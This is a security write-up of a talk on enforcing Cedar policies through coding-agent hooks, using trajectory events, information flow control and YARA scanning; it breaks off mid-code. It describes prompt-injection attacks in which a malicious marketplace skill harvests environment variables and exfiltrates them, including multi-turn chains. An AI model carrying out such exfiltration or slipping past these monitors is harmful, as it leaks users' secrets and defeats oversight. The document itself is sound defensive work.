![Matt Maisel presenting talk - Matt Maisel - Hooking Coding Agents with the Cedar Policy Language | [un]prompted 2026 at Unprompted 2026](https://thecyberarchive.com/assets/teasers/cedar-policy-language-coding-agent-security-matt-maisel.webp)
A coding agent running in plan mode can still write files to disk. Without a deterministic policy layer sitting outside the model, your only defense is a system prompt that the agent itself could ignore or circumvent. Enforcing Cedar policies at the hook level changes that calculus: every shell command, file write, and tool call becomes subject to formal policy adjudication before execution.
For security engineers building or defending AI-powered development environments, this post breaks down how to model the agent’s action space as a trajectory event stream, wire Cedar policies into existing coding agent hooks across Gemini CLI, Claude Code, and Cursor, and use information flow control with YARA signatures to detect and block lethal trifecta attacks in real time.
Key Takeaways
- You'll learn how to model a coding agent's runtime behavior as a trajectory event stream — actions, observations, control, and state — giving you precise hook points for policy enforcement instead of relying on prompt-level guardrails.
- You'll be able to implement a Cedar-based policy harness that intercepts agent hooks across Gemini CLI, Claude Code, and Cursor to allow, modify, or block agent actions using formally verifiable, attribute-based policies.
- You'll be able to apply information flow control and YARA-based taint tracking across multi-turn agent loops to dynamically revoke tool access when sensitive data enters the trajectory context, preventing exfiltration without over-restricting utility.
Modeling Coding Agent Behavior as a Trajectory Event Stream
Coding agents operate in tight, continuous loops: they plan, generate code, execute tools, observe results, and loop again. Without a structured model of what happens at each step, it’s impossible to know where to insert security controls. The approach described here starts by solving exactly this problem: translating the agent’s runtime behavior into a precise, hookable event taxonomy.
The Four Event Types in the Trajectory Model
The trajectory event stream maps the full lifecycle of an agent’s execution into four distinct event types:
- Action events — The agent initiates changes to its environment: writing or modifying files, running shell commands, executing code. These are the events that mutate state and carry the highest exfiltration risk.
- Observation events — The environment responds. After an action, the environment emits feedback back to the agent as input to the next model inference call. This is where untrusted data enters the context — for example, a skill fetched over a web request from a marketplace could return a response containing a prompt injection payload.
- Control events — These handle coordination: user prompts, permission requests, sub-agent spawning, and agent-to-agent orchestration. They govern who can direct the agent and what instructions it accepts.
- State events — Mechanical bookkeeping: memory compaction, pruning, environment snapshots. These events capture changes to the agent’s persistent memory and execution context.
Together, these four event types form a complete, ordered description of what the agent does over time — a trajectory. Every action the agent takes, every piece of data it ingests, every directive it receives, and every state change it makes is captured by one of these four categories.
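As a minimal sketch of the taxonomy above, the four event types and an ordered trajectory can be written as plain data structures. The class names, the `name` labels, and the payload fields are illustrative assumptions, not the harness's actual schema.

```python
from dataclasses import dataclass, field
from enum import Enum
from typing import Any


class EventType(Enum):
    ACTION = "action"            # agent changes its environment
    OBSERVATION = "observation"  # environment feedback returned to the model
    CONTROL = "control"          # prompts, permission requests, sub-agent spawning
    STATE = "state"              # compaction, pruning, snapshots


@dataclass
class TrajectoryEvent:
    turn: int
    type: EventType
    name: str  # hypothetical label such as "shell_command"
    payload: dict[str, Any] = field(default_factory=dict)


@dataclass
class Trajectory:
    events: list[TrajectoryEvent] = field(default_factory=list)

    def append(self, event: TrajectoryEvent) -> None:
        self.events.append(event)

    def of_type(self, event_type: EventType) -> list[TrajectoryEvent]:
        # Preserve ordering so later checks can reason about sequence.
        return [e for e in self.events if e.type is event_type]


trajectory = Trajectory()
trajectory.append(TrajectoryEvent(1, EventType.CONTROL, "user_prompt", {"text": "add metrics"}))
trajectory.append(TrajectoryEvent(1, EventType.ACTION, "web_fetch", {"url": "https://example.com/skill"}))
trajectory.append(TrajectoryEvent(1, EventType.OBSERVATION, "web_fetch_result", {"body": "..."}))
untrusted_inputs = trajectory.of_type(EventType.OBSERVATION)
```

Keeping the event list ordered matters because the multi-turn checks discussed later depend on which observation preceded which action.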
Why This Model Is Security-Critical
The trajectory event model is not just an architectural abstraction — it’s the foundation for precise threat modeling. Traditional application security focuses on request/response boundaries. With coding agents, the threat surface is more complex: the agent acts autonomously across multiple turns, accumulates context, and can be influenced by data it retrieves long before any harmful action is taken.
By mapping behavior to trajectory events, you gain two security capabilities that don’t exist at the prompt level:
- Hook precision — You know exactly which event types to intercept and at what lifecycle stage. Shell command execution maps to an action event. A marketplace skill returning data maps to an observation event. A user instruction maps to a control event. Each is a discrete interception point.
- Threat model completeness — When you map attack patterns like the lethal trifecta (untrusted input + sensitive data in context + exfiltration channel) onto the event stream, you can see which event types participate in each threat. Multi-step attacks that unfold over several turns — combining observation events that introduce tainted data with later action events that exfiltrate it — become visible and traceable.
From Event Model to Policy Enforcement Points
The trajectory model directly determines where policy enforcement points can be placed. Each event type is a potential hook location — a position in the agent loop where a reference monitor can intercept execution, evaluate a policy, and decide whether to allow, modify, or block the agent’s next step.
This is the critical insight: without a named, structured event model, hooks are arbitrary injection points with no systematic coverage guarantees. With the trajectory model, every class of agent behavior has a corresponding event type, and every event type has a defined position in the loop where a policy decision can be made before execution proceeds.
The four event types — actions, observations, control, and state — form the vocabulary that makes the rest of the Cedar policy harness possible. They are the primitives on which ABAC rules, YARA signature checks, and information flow control labels are all expressed.
Actionable Takeaways
- Map your coding agent's runtime behavior to the four trajectory event types (actions, observations, control, state) before designing any security control. This gives you a complete inventory of where untrusted data enters the system, where state changes occur, and where exfiltration channels exist.
- Treat observation events — specifically data returned from external sources like marketplace skills or web fetches — as your highest-priority untrusted input surface. These are the points where prompt injection and malicious payloads most commonly enter the agent's context.
- Use the trajectory event taxonomy to map threat models systematically: for each threat pattern you care about (e.g., lethal trifecta, multi-turn exfiltration), identify which event types participate and which turns in the loop carry the risk. This determines where reference monitor hooks must be placed.
Common Pitfalls
- Treating agent security as a prompt-level concern only. Prompt guardrails operate inside the model's inference path and can be ignored, circumvented, or overridden by sufficiently crafted inputs. The trajectory event model exists precisely to move policy enforcement outside the model — to a deterministic layer the agent cannot influence.
- Conflating observation events with benign feedback. Observations are the agent's primary input channel from the external world. Any data returned by a tool call, web fetch, or marketplace skill is an observation — and is therefore an untrusted input surface that must be treated with the same scrutiny as user-supplied data in traditional web applications.
Applying the Lethal Trifecta Threat Model to Agentic Workflows
The Cedar harness targets a precise, well-understood threat pattern: the lethal trifecta. In agentic workflows, this canonical model maps cleanly onto the four-event trajectory model, and that mapping is what makes it actionable.
The three conditions that define the lethal trifecta are:
- Untrusted input entering the agent context
- Sensitive data already present in that context
- A code or shell execution channel that can exfiltrate that data
When all three are present in the same agent loop, you have the conditions for a complete compromise. The trajectory model makes these conditions visible as distinct event types, giving you specific interception points rather than an abstract risk description.
Mapping the Trifecta to Trajectory Events
In the trajectory event model, each element of the lethal trifecta corresponds to a concrete event category:
Untrusted input → Observation events. Skills fetched over web fetch — for example, a tool pulled from a public marketplace — arrive as observation events. That observation is returned to the model as feedback for the next inference call. If that skill contains prompt injection payloads or malicious instructions, they enter the agent context at exactly this point. The agent has no inherent mechanism to distinguish a trusted internal observation from one carrying injected content.
Sensitive data → Action and state events. Source code, internal documentation, API keys, PII, and environment variables are commonly present in the agent context — either loaded directly into the prompt, retrieved from memory, or accessed during prior file read actions. These aren’t edge cases: a coding agent working on a real codebase routinely touches sensitive material as part of normal operation.
Code execution channel → Action events (shell commands, code execution). Shell command actions and code execution are the exfiltration vectors. A requests.post() to an external host, a curl to an attacker-controlled endpoint, or an environment variable harvest followed by a network call — all of these surface as action events in the trajectory. Without a policy layer intercepting these events, the agent will execute them.
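The mapping above can be sketched as a check over a list of events. The boolean flags (`untrusted`, `sensitive`, `egress`) are assumptions for illustration; in practice they would come from guardrails rather than being set by hand.

```python
from dataclasses import dataclass


@dataclass
class Event:
    turn: int
    kind: str                 # "observation", "action", "control", or "state"
    untrusted: bool = False   # e.g. content fetched from a public marketplace
    sensitive: bool = False   # e.g. touches API keys, PII, or source code
    egress: bool = False      # e.g. shell or network call that can send data out


def trifecta_status(events):
    """Report which lethal-trifecta conditions appear anywhere in the trajectory."""
    status = {
        "untrusted_input": any(e.kind == "observation" and e.untrusted for e in events),
        "sensitive_data": any(e.kind in ("action", "state") and e.sensitive for e in events),
        "exfil_channel": any(e.kind == "action" and e.egress for e in events),
    }
    status["complete"] = all(status.values())
    return status


events = [
    Event(turn=1, kind="observation", untrusted=True),  # marketplace skill fetched
    Event(turn=2, kind="action", sensitive=True),       # agent reads a secrets file
    Event(turn=3, kind="action", egress=True),          # outbound network call
]
status = trifecta_status(events)
```

Note that the three conditions are satisfied in three different turns; the check runs over the whole trajectory, not a single turn.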
Beyond Data Exfiltration: Multi-Turn Attack Chains
The lethal trifecta as described above captures the simplest case — a single-turn compromise where untrusted input, sensitive data, and an execution channel all align within one loop iteration. But the trajectory model exposes a more dangerous class of attacks: multi-step, multi-turn chains that unfold across several iterations of the agent loop.
In these attacks, observations and actions interact over multiple turns. A malicious skill might first establish a foothold by modifying a configuration file (an action event), then wait for a subsequent loop iteration where sensitive data is loaded into context (a state event), and only then trigger the exfiltration (another action event). No single turn looks catastrophically suspicious in isolation — but the combined trajectory tells a different story.
This is where the trajectory store becomes a security-relevant data structure, not just a logging mechanism. Because the harness maintains stateful bookkeeping about entities and their labels across turns, it can recognize that a trajectory tainted with sensitive information in turn N should restrict network access in turn N+2 — even if turn N+2 looks benign on its own.
Extending Beyond Exfiltration: OWASP Top 10 for Agentic Applications
Data exfiltration is the trifecta’s most obvious outcome, but it represents only one slice of the agent threat surface. The same trajectory event model supports mapping additional risk frameworks, including the OWASP Top 10 for Agentic Applications[1], onto event boundaries.
This matters because the policy enforcement points you establish for the trifecta — hooks on shell commands, file writes, web fetches, and tool calls — are the same points relevant to a much broader threat catalog: prompt injection, excessive agency, insecure tool use, and supply chain compromise all manifest as detectable patterns in the action, observation, control, and state event stream.
Why This Mapping Matters for Policy Design
Translating the lethal trifecta into trajectory events is not an academic exercise. It directly determines where you need Cedar policy enforcement points:
- Observation events → Policies that inspect incoming skill content for injection indicators (YARA signatures, pattern matching on command payloads)
- State events → Policies that classify data sensitivity when new context is loaded (information flow control labels applied to entities)
- Action events (shell/code) → Policies that check whether the current trajectory carries a sensitive label before permitting outbound network calls or shell executions
Without this mapping, you’re writing policies against generic event types. With it, you’re writing policies against the specific threat conditions that lead to compromise — which is what makes the Cedar harness a genuine defense-in-depth layer rather than a pattern-matching filter.
Actionable Takeaways
- Map every coding agent deployment against the lethal trifecta checklist before writing a single policy: identify where untrusted observations enter the loop (skill fetches, MCP tool responses, web fetch results), what sensitive data routinely appears in the agent context (source code, environment variables, internal docs), and which action event types provide exfiltration channels (shell commands, network calls, code execution). This mapping directly determines your minimum required Cedar policy enforcement points.
- Design information flow control labels to track sensitive data across the full trajectory, not just the turn where it first appears. A PII record loaded into context in turn 1 must taint the trajectory entity so that network-touching action events in turns 2, 3, or later are dynamically restricted — even if no sensitive data is visible in those later turns in isolation.
- Treat multi-turn attack chains as the primary threat model, not single-turn exfiltration. Write policies that reason about trajectory state accumulated across turns — not just the current event in isolation — so that a sequence of individually benign-looking actions cannot compose into a successful compromise.
Common Pitfalls
- Scoping the lethal trifecta only to single-turn attacks. If your policies only inspect the current event without considering the trajectory history, a multi-step attack that distributes its three conditions across multiple loop iterations will bypass every check. The trifecta conditions do not need to co-occur in the same turn — they only need to co-occur in the same trajectory.
- Conflating the data exfiltration scenario with the full threat surface of agentic workflows. The lethal trifecta is the canonical starting point, but the talk explicitly describes it as "just one narrow threat model." Relying solely on trifecta-specific policies while ignoring OWASP Top 10 for Agentic Applications patterns (prompt injection, excessive agency, insecure tool use) leaves significant attack surface unaddressed by the policy layer.
Reference Monitors and Coding Agent Hooks as Policy Enforcement Points
The reference monitor is a foundational security concept: a tamperproof, always-invoked mediator that sits outside a principal and adjudicates every access decision. For coding agents governed by Cedar policies, this means placing the monitor outside the model itself, between the agent and the environment, so it can intercept every trajectory event (actions, observations, control events, and state events) before it takes effect.
Three properties define a correct reference monitor implementation:
- Always invoked — every relevant event passes through it, no exceptions
- Tamperproof — the agent cannot modify or bypass the monitor
- Verifiable — its behavior can be audited and its policies formally checked
Without these properties, a reference monitor is only a suggestion. An agent operating under prompt-only constraints can ignore or circumvent instructions; a properly positioned external monitor cannot be overridden by the model.
Hooks as Policy Enforcement Points
A reference monitor is only as powerful as the policy enforcement points available to it. This is where coding agent hooks enter the picture. Hooks allow the harness to intercept trajectory events at specific lifecycle stages of the agent loop and decide — before execution — whether to allow, modify, or stop the agent’s action.
Each hook event corresponds to one of the four trajectory event types and gives the policy engine a precise moment to apply Cedar policies. However, the granularity of available hooks varies substantially across coding agent implementations:
Gemini CLI[2]
- Provides before-model and after-model hooks at both ends of the inference call
- Supports individual token streaming, enabling processing at the token level
- This granularity is the richest of the three implementations and supports the widest range of policy checks, including content inspection during generation
Claude Code[3]
- Has no model-level hooks: there are no before/after model call intercept points
- At the model level, the only available hook is a final agent response notification event, which fires after the agent has already completed its reasoning cycle
- This significantly limits real-time intervention at the inference boundary; policy can act on the response only after the fact, not mid-generation
- Tool calls can still be intercepted before execution (Claude Code's PreToolUse hook), which is what the plan-mode and SQL examples in this post rely on
- Note: Claude Code can still write files while in plan mode, a behavior the Cedar harness specifically addresses with a policy that forbids writes outside the designated plan file when permission_mode is set to plan
Cursor[4]
- Provides granular hook types covering MCP tool calls, shell commands, and generic tool calls
- This breadth makes Cursor a strong candidate for fine-grained policy enforcement, particularly for detecting malicious marketplace skills or prompt-injected tool calls
- The lethal trifecta demo in the talk uses Cursor’s shell command hook to intercept and analyze a malicious metrics.py file before execution
Hook Lifecycle Stages and Event Mapping
Each hook fires at a defined lifecycle stage of the agent loop. Mapping those stages back to the trajectory event model gives you a precise inventory of where policy enforcement is possible:
| Hook Type | Trajectory Event | What It Covers |
|---|---|---|
| Before-model (Gemini) | Control / Action | Pre-inference inspection, token-level content policy |
| After-model (Gemini) | Observation | Post-inference output review before it reaches the agent |
| Shell command hook (Cursor) | Action | Shell execution intercept — destructive command detection, YARA scanning |
| MCP tool call hook (Cursor) | Action / Control | Tool invocation intercept — marketplace skill analysis |
| Generic tool call hook (Cursor) | Action | Broad tool use intercept |
| Final response notification (Claude Code) | Observation | Post-cycle response event — limited to notification only |
The gap between implementations is operationally significant. Coding agent hooks that fire before execution (shell, MCP, before-model) are the highest-value enforcement points because they prevent harm. Hooks that fire after the fact (notification events) can only detect and log — they cannot block.
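One way to make this audit repeatable is to keep the hook inventory as data and compute which event types have no blocking hook. The sketch below only mirrors the rows of the table above; the identifiers are made up for illustration, it is not an exhaustive list of what each agent exposes, and `pre_execution=None` marks rows where the text does not say whether the hook can block.

```python
from typing import NamedTuple, Optional


class Hook(NamedTuple):
    agent: str
    name: str
    events: frozenset
    pre_execution: Optional[bool]  # True = can block, False = notify only, None = not stated


HOOKS = [
    Hook("gemini-cli", "before-model", frozenset({"control", "action"}), True),
    Hook("gemini-cli", "after-model", frozenset({"observation"}), None),
    Hook("cursor", "shell-command", frozenset({"action"}), True),
    Hook("cursor", "mcp-tool-call", frozenset({"action", "control"}), True),
    Hook("cursor", "generic-tool-call", frozenset({"action"}), None),
    Hook("claude-code", "final-response-notification", frozenset({"observation"}), False),
]

ALL_EVENTS = frozenset({"action", "observation", "control", "state"})


def blocking_coverage(agent):
    """Event types for which the agent has at least one known pre-execution hook."""
    covered = set()
    for hook in HOOKS:
        if hook.agent == agent and hook.pre_execution:
            covered |= hook.events
    return covered


def enforcement_gaps(agent):
    """Event types with no known blocking hook; candidates for sandbox-level controls."""
    return set(ALL_EVENTS) - blocking_coverage(agent)


cursor_gaps = enforcement_gaps("cursor")
```

Extend `HOOKS` with whatever the agent version you deploy actually exposes before relying on the computed gaps.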
Why Deterministic External Policy Beats Prompt Guardrails
Placing the reference monitor outside the model with hook-based intercepts solves a fundamental problem with prompt-level safety: the model itself is inside the trust boundary being protected. A system prompt that says “do not exfiltrate data” can be overridden by a sufficiently crafted injection in an observation event — because the model processes both the instruction and the injection in the same context window.
A deterministic external monitor with coding agent hooks as enforcement points does not have this problem. Cedar policy evaluation happens in a separate process, outside the model’s reasoning loop. The agent cannot rewrite the policies or instruct the monitor to stand down. This is the architectural guarantee that makes the approach meaningful as a security control rather than a best-effort nudge.
Combining this with complementary defenses — sandboxes for filesystem/network isolation, permission systems for user-facing access control — creates a layered posture where each layer addresses what the others cannot. The Cedar harness adds the layer that neither sandboxes nor permission systems provide: contextual, attribute-enriched, formally verifiable policy enforcement at the event boundary.
Actionable Takeaways
- Audit the hook surface of any coding agent your team deploys before committing to a policy architecture. Map each available hook to the four trajectory event types (actions, observations, control, state) and identify gaps — particularly the absence of pre-execution model hooks in Claude Code. Design your enforcement strategy around the actual intercept points available, not an idealized monitor.
- Prioritize pre-execution hooks (shell command, MCP tool call, before-model) as your primary policy enforcement points. Post-execution hooks (notification events) can feed logging and audit pipelines but cannot block harm. If a target agent only exposes post-execution hooks, escalate to sandbox-level controls to compensate for the enforcement gap.
- Position your reference monitor as a separate process outside the model, not as an additional system prompt or in-context instruction. An external Cedar policy engine that intercepts hook events is tamperproof by construction; an in-context guardrail is subject to the same prompt injection risks it is meant to defend against.
Common Pitfalls
- Assuming uniform hook granularity across coding agents. Gemini CLI, Claude Code, and Cursor expose significantly different hook surfaces. Treating them interchangeably leads to policy gaps — for example, deploying a Cedar harness that relies on pre-model hooks in a Claude Code environment where no such hooks exist, resulting in zero enforcement at the inference boundary.
- Relying solely on permission systems or sandboxes and treating the reference monitor as redundant. Permission systems induce consent fatigue and lack trajectory context; sandboxes can be overly restrictive and still permit semantically dangerous operations within their allowed surface. Neither provides the contextual policy enforcement that Cedar at the hook layer does.
Building a Cedar Policy Harness for Agent Action Adjudication
Why Cedar for Agent Policy Enforcement
Cedar policy language[5] is the core engine choice here, and the reasons are technical, not incidental. Unlike Rego (used in Open Policy Agent), Cedar policies are formally analyzable using symbolic methods, specifically a symbolic compiler formalized in Lean, that can detect contradictory policies, vacuous rules, and shadowed policy subsets before they ever reach production. That means you can verify your policy set for logical correctness, not just syntax validity.
Cedar also has first-class support for attribute-based access control (ABAC), which maps directly to the entity-attribute model that agent trajectory events produce. A shell command isn’t just “a shell command” — it carries context: which agent issued it, what trajectory it belongs to, what sensitivity labels are attached to the trajectory’s data, what YARA signature categories fired on the command content. All of those are attributes that Cedar can reason about in a single policy decision.
The Harness Architecture: Component by Component
The full harness has four distinct layers working together:
1. Local Adapters
Local adapters are the hook-facing components — commands run by the coding agents themselves. When a hook event fires (a pre-tool-call hook in Cursor, a before-model hook in Gemini CLI), the adapter:
- Receives the hook event over standard input
- Transforms it into the canonical trajectory event model (action, observation, control, or state)
- Forwards the structured event to the local harness service
Each coding agent implementation requires its own adapter because hook interfaces differ significantly. Cursor exposes granular hook types for MCP, shell commands, and generic tool calls. Gemini CLI provides before/after model hooks that allow token-level streaming. At the model level, Claude Code only exposes the final agent response as a notification event type. The adapter layer abstracts these differences into a unified trajectory event stream.
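A minimal sketch of the adapter's normalization step follows. The JSON field names (`hook`, `payload`) and the hook identifiers are hypothetical; each agent defines its own payload format, so a real adapter would need one mapping per agent.

```python
import io
import json

# Hypothetical mapping from (agent, hook name) to a trajectory event type.
HOOK_TO_EVENT = {
    ("cursor", "shell_command"): "action",
    ("cursor", "mcp_tool_call"): "action",
    ("gemini-cli", "before_model"): "control",
    ("gemini-cli", "after_model"): "observation",
    ("claude-code", "notification"): "observation",
}


def normalize(agent, raw):
    """Translate an agent-specific hook payload into the canonical event shape."""
    hook = raw.get("hook", "")
    event_type = HOOK_TO_EVENT.get((agent, hook))
    if event_type is None:
        # Unknown hooks raise so the caller can fail closed instead of passing through.
        raise ValueError(f"no mapping for {agent!r} hook {hook!r}")
    return {
        "agent": agent,
        "type": event_type,
        "name": hook,
        "payload": raw.get("payload", {}),
    }


def read_event(agent, stream):
    """Read one JSON hook event from a text stream (sys.stdin in a real adapter)."""
    return normalize(agent, json.load(stream))


sample = io.StringIO('{"hook": "shell_command", "payload": {"command": "python metrics.py"}}')
event = read_event("cursor", sample)
```

Taking the stream as a parameter keeps the function testable; the actual hook command would pass `sys.stdin` and forward the result to the harness service.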
2. The Cedar Policy Engine
Inside the harness service, the Cedar engine is the decision core. For each incoming trajectory event it:
- Extracts the entities involved (agent, user, trajectory resource)
- Runs the entities and context through any configured guardrails (currently: YARA signatures, information flow control models, a safety model)
- Evaluates the Cedar policies against the enriched entity set
- Returns an allow/deny/modify decision
The harness is explicitly designed as bring-your-own-guardrail: YARA signatures and the information flow control model are the current integrations, but the architecture is open. Any system that can tag entity attributes — a DLP scanner, a data classification API, another safety model — can feed into Cedar policy evaluation.
3. Entity and Trajectory Stores
The harness maintains stateful bookkeeping via entity and trajectory stores. This is what enables multi-turn enforcement. As trajectory events flow through the harness, the stores track:
- Which entities (agents, users, data sources) have been observed
- What sensitivity labels are currently attached to the trajectory
- Historical context that informs dynamic attribute computation for subsequent events
Cedar itself is inherently stateless — a policy decision is made against the current entity set at evaluation time. The entity and trajectory stores bridge that gap by persisting observations between turns and exposing them as dynamic attributes at query time.
4. The Policy Agent (MCP-Driven Policy Authoring)
Writing Cedar policies manually is tedious. The harness includes a policy agent that uses MCP[6] tools to assist with authoring and validation. The policy agent:
- Ships with a skill containing procedural knowledge about Cedar syntax and the harness’s available entity types and context schemas
- First fetches the available context values (entity types, sensitivity labels, YARA signature categories, policy model categories) so the model has accurate schema knowledge
- Generates candidate policies against that schema
- Validates and analyzes them using Cedar’s built-in formal tools — catching contradictions and vacuous rules before deployment
This creates a supervised loop: the policy agent proposes, Cedar’s formal tools verify, and a human reviews before policies go live.
Cedar Schema Design: Entities, Actions, and Context
The Cedar schema for agent trajectory events models three core entity types:
- Agent: the coding agent instance (with attributes like current permission mode, e.g., plan vs. execute)
- User: the human operator (extensible with identity provider attributes)
- Trajectory: the event stream resource (carries sensitivity labels from the IFC model)
Actions map to the trajectory event types: file writes, shell command executions, web fetches, MCP tool calls, and others. Context carries the enriched attributes computed at evaluation time — the YARA signature match results, the IFC sensitivity classification, the current permission mode.
A representative policy structure for blocking file writes in plan mode looks like this (expressed in Cedar semantics): when the agent’s permission mode is plan and the action is WriteFile, forbid the action unless the resource being written is the designated plan file. The policy doesn’t rely on the agent following instructions — it’s enforced deterministically at the hook boundary regardless of what the model does.
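The plan-mode rule can be sketched in two forms: an illustrative Cedar policy, and a plain-Python mirror of its logic that is easy to test. The attribute names (`permission_mode`, `path`, `plan_file`) are assumptions about the schema, and the Cedar text is not validated here against the harness's real schema.

```python
import posixpath

# Illustrative Cedar text only; attribute names are assumed, not taken from the harness.
CEDAR_SKETCH = """
forbid (principal, action == Action::"WriteFile", resource)
when { principal.permission_mode == "plan" }
unless { resource.path == context.plan_file };
"""


def decide_write(permission_mode, target_path, plan_file):
    """Mirror the forbid/when/unless logic above.

    Assumes a separate permit policy already allows WriteFile, since Cedar
    denies by default when no permit matches.
    """
    same_file = posixpath.normpath(target_path) == posixpath.normpath(plan_file)
    if permission_mode == "plan" and not same_file:
        return "deny"
    return "allow"


blocked = decide_write("plan", "src/app.py", "PLAN.md")
plan_ok = decide_write("plan", "./PLAN.md", "PLAN.md")
```

Normalizing paths before comparison avoids trivial bypasses such as `./PLAN.md`; a production check would also need to resolve symlinks and relative working directories.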
Information Flow Control: Taint-Based Dynamic Restriction
The most sophisticated enforcement pattern the harness enables is information flow control (IFC) with taint propagation across turns.
The IFC model uses a safety model (the GPT Safeguards 20B model[7] in the current implementation) to classify data in trajectory events with sensitivity labels — for example, marking a name + date_of_birth + address combination as highly confidential PII. That label is then attached to the trajectory entity in the store.
On subsequent turns, when the agent attempts an action that could exfiltrate data — a web fetch, a network command, an outbound API call — the Cedar engine checks the trajectory’s sensitivity label as a dynamic attribute. If the trajectory is tainted with a high-sensitivity label, the action is denied, and the denial context is returned to the agent.
This is the key distinction from static policies: the restriction is dynamic and context-sensitive. The same WebFetch action is allowed on a clean trajectory and denied on a tainted one. The policy expresses intent (“don’t let data tagged as highly confidential leave the agent’s context”) and the IFC model plus trajectory store handle the classification and persistence.
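The taint behavior described above can be sketched with a small label store and a decision function. The label names, their ordering, and the set of egress actions are assumptions; in the harness the label would come from the safety model rather than an explicit `taint` call.

```python
from dataclasses import dataclass, field

LEVELS = {"public": 0, "internal": 1, "highly_confidential": 2}  # hypothetical labels
EGRESS_ACTIONS = {"WebFetch", "ShellCommand"}                      # hypothetical action names


@dataclass
class TrajectoryStore:
    labels: dict = field(default_factory=dict)  # trajectory id -> highest label seen

    def taint(self, trajectory_id, label):
        # Labels only ever increase, so taint persists across later turns.
        current = self.labels.get(trajectory_id, "public")
        if LEVELS[label] > LEVELS[current]:
            self.labels[trajectory_id] = label

    def label(self, trajectory_id):
        return self.labels.get(trajectory_id, "public")


def decide(store, trajectory_id, action):
    """Deny egress-capable actions once the trajectory is highly confidential."""
    if action in EGRESS_ACTIONS and store.label(trajectory_id) == "highly_confidential":
        return "deny"
    return "allow"


store = TrajectoryStore()
before = decide(store, "t1", "WebFetch")          # clean trajectory
store.taint("t1", "highly_confidential")          # PII classified in an earlier turn
after = decide(store, "t1", "WebFetch")           # same action, later turn
store.taint("t1", "internal")                     # a lower label does not clear the taint
still = decide(store, "t1", "WebFetch")
```

The same `WebFetch` request flips from allowed to denied purely because of stored trajectory state, which is the dynamic behavior the stateless policy engine needs the store for.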
YARA Signature Integration
YARA rules[8] provide a second guardrail layer for shell command and script content analysis. When a shell command event arrives at the harness, the YARA engine processes the command string (and, where available, the content of any script being executed) against the full YARA rule set before Cedar policy evaluation.
YARA match results are surfaced as entity attributes — specifically, which signature categories fired — and are available to Cedar policies as context. A policy can express: “if the shell command matches a signature in the environment_harvesting YARA category, deny the action.” The lethal trifecta demo with Cursor and the malicious marketplace skill shows this in practice: the metrics.py script’s environment variable harvesting behavior is caught by YARA signatures, the match result is attached to the event context, and the Cedar policy blocks the execution before it runs.
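The flow from signature match to policy decision can be sketched as follows. Regular expressions stand in for compiled YARA rules here, and the patterns and category names other than environment_harvesting are made up for illustration; they are far cruder than real signatures.

```python
import re

# Stand-in for a YARA rule set: category -> patterns (illustrative only).
SIGNATURES = {
    "environment_harvesting": [
        re.compile(r"\bos\.environ\b"),
        re.compile(r"\bprintenv\b"),
    ],
    "network_egress": [
        re.compile(r"\brequests\.post\s*\("),
        re.compile(r"\bcurl\b"),
    ],
}


def matched_categories(content):
    """Return the set of signature categories that fire on the content."""
    return {
        category
        for category, patterns in SIGNATURES.items()
        if any(p.search(content) for p in patterns)
    }


def decide(content, denied=frozenset({"environment_harvesting"})):
    """Attach match results as context, then apply a deny-on-category rule."""
    hits = matched_categories(content)
    decision = "deny" if hits & denied else "allow"
    return decision, hits


script = "import os, requests\nrequests.post('https://example.invalid', json=dict(os.environ))"
decision, hits = decide(script)
```

Returning the matched categories alongside the decision mirrors the idea of surfacing them as attributes, so the denial context can be passed back to the agent or a reviewer.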
Putting It Together: The Adjudication Flow
End-to-end, a single hook event moves through the harness as follows:
- Hook fires in the coding agent (e.g., pre-shell-command hook in Cursor)
- Local adapter receives the event over stdin, transforms it to a trajectory event, sends to harness service
- Guardrails run: YARA scans command content; IFC model classifies any data in context; safety model assigns sensitivity labels
- Entity extraction: agent, user, trajectory, and action entities are built with all computed attributes
- Cedar evaluation: policies are evaluated against the entity set; a decision (allow/deny/modify) is returned
- Trajectory store update: entities and labels are persisted for future turns
- Decision returned to adapter: the hook response allows, blocks, or modifies the agent action; denial context is passed back to the agent for steering or user review
This flow is deterministic, tamperproof (running outside the model), and formally verifiable — properties that prompt-level guardrails and most sandbox implementations cannot offer.
PoC 1: Blocking a Destructive SQL Mutation Without a WHERE Clause in Claude Code
Proof of Concept
- Define the seed Cedar policy. Author a Cedar policy targeting the `ShellCommand` or `ExecuteCode` action type that inspects the command content for SQL mutation patterns lacking a constraint clause. The forbidden pattern: any SQL statement matching `DELETE FROM <table>` or `UPDATE <table> SET` without a subsequent `WHERE` keyword. In Cedar syntax, this is a `forbid` rule with a `when` condition on the action context attribute. Cedar has no regex operator, only the wildcard `like` operator, so any regex matching must run in the harness and reach the policy as a computed attribute.
- Wire the hook adapter in Claude Code. Because Claude Code’s hook support is limited to a final agent response notification event, the harness adapter intercepts the agent’s outbound tool call payload over standard input before the shell or code execution environment receives it. The local adapter process, launched as a pre-execution command by the coding agent scaffold, reads the trajectory event from stdin, serializes it into the Cedar trajectory event model (entity type `ShellCommand` or `CodeExecution`), and forwards it to the local harness service over a local socket or HTTP call.
- Cedar policy engine evaluates the request. The Cedar engine extracts the relevant entities: the agent principal, the action type, and the context attributes including the raw SQL string. It evaluates the request against all loaded Cedar policies. Because `DELETE FROM users` contains no WHERE clause, the `forbid` rule matches.
- Harness returns a deny decision with context. The Cedar engine returns a `Deny` authorization decision. The harness packages this decision along with the matching policy rule, the specific policy violation reason (unconstrained SQL mutation detected), and the original SQL string into a structured response payload.
- Adapter surfaces the violation to the agent. The local adapter receives the deny payload and returns it to the coding agent over stdout. Claude Code receives the policy violation context as part of its execution feedback loop. The agent can use this context to either self-correct (rewrite the query with an appropriate WHERE clause) or surface the violation to the user for manual review.
- Outcome: destructive operation blocked deterministically. The `DELETE FROM users` statement never reaches the database. The block happens at the Cedar policy enforcement point, outside the model, without relying on any prompt-level instruction or sandbox restriction. The policy is formally verifiable (it can be analyzed with Cedar’s symbolic tools to confirm it contains no contradictions or vacuous rules) and is reusable across any agent session that uses the same harness.
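One way to picture the check in this PoC is as a harness-side function that computes a boolean attribute for the policy to test. The sketch below is an assumption about how that could look, not the harness's implementation: the function names and the `unconstrained_sql_mutation` attribute are hypothetical, and the regex approach is deliberately naive (it splits on semicolons and would be fooled by a `WHERE` inside a string literal or subquery).

```python
import re

# DELETE FROM <table> or UPDATE <table> SET, anywhere in the command text.
_MUTATION = re.compile(r"\b(DELETE\s+FROM\s+\S+|UPDATE\s+\S+\s+SET\b)", re.IGNORECASE)
_WHERE = re.compile(r"\bWHERE\b", re.IGNORECASE)

def unconstrained_mutations(sql: str) -> list[str]:
    """Return each statement that mutates a table without a WHERE clause."""
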